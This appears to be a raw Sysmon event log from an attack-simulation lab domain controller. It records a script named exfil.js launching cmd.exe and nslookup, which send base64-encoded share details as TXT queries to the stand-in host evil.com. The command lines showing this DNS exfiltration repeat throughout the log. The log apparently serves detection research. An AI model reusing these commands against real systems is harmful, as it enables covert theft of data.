U2hhcmVOYW1lOiBORVRMT0dPTg== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlwbjwxbd.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000197363Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.473{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlivin.tmpMD5=72212EBDCB2E8E793A1B2134D4FA7DE3,SHA256=B332410D88A2D1B397F1BE63E741050D785B52E6644B4C66DB2FEDBE9A959973,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000197362Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.442{2E1864BB-17B4-629A-2B3F-000000005F02}47763588C:\Windows\system32\conhost.exe{2E1864BB-17B4-629A-2C3F-000000005F02}8008C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197361Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.427{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197360Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.427{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197359Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.427{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197358Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.427{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197357Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.427{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B4-629A-2C3F-000000005F02}8008C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197356Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.427{2E1864BB-17B4-629A-2A3F-000000005F02}79327248C:\Windows\system32\cmd.exe{2E1864BB-17B4-629A-2C3F-000000005F02}8008C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197355Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.440{2E1864BB-17B4-629A-2C3F-000000005F02}8008C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgSVBD evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B4-629A-2A3F-000000005F02}7932C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgSVBD evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlivin.tmp 2>&1 10341000x8000000000000000197354Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.411{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17B4-629A-2B3F-000000005F02}4776C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197353Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.411{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B4-629A-2B3F-000000005F02}4776C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197352Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.411{2E1864BB-17B4-629A-2B3F-000000005F02}47763588C:\Windows\system32\conhost.exe{2E1864BB-17B4-629A-2A3F-000000005F02}7932C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197351Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.406{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B4-629A-2B3F-000000005F02}4776C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197350Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.389{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197349Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.389{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197348Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.389{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197347Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.389{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197346Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.389{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B4-629A-2A3F-000000005F02}7932C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197345Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.389{2E1864BB-17A1-629A-783D-000000005F02}5552896C:\Windows\System32\WScript.exe{2E1864BB-17B4-629A-2A3F-000000005F02}7932C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197344Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.399{2E1864BB-17B4-629A-2A3F-000000005F02}7932C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgSVBD evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlivin.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000197343Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.389{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlgqfkhdc.tmpMD5=8243B24CCFEB9BB233B3379BEC4F1A23,SHA256=640266002D96A03904AAA3A39C38EBB9E7EB5FB5F8774575491C759B17BE418A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000197342Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.358{2E1864BB-17B4-629A-283F-000000005F02}29327308C:\Windows\system32\conhost.exe{2E1864BB-17B4-629A-293F-000000005F02}1096C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197341Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.358{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197340Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.358{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197339Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.358{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197338Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.358{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197337Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.358{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17B4-629A-293F-000000005F02}1096C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197336Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.358{2E1864BB-17B4-629A-273F-000000005F02}48165836C:\Windows\system32\cmd.exe{2E1864BB-17B4-629A-293F-000000005F02}1096C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197335Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.368{2E1864BB-17B4-629A-293F-000000005F02}1096C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiA= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B4-629A-273F-000000005F02}4816C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgqfkhdc.tmp 2>&1 10341000x8000000000000000197334Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.342{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17B4-629A-283F-000000005F02}2932C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197333Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.342{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B4-629A-283F-000000005F02}2932C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197332Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 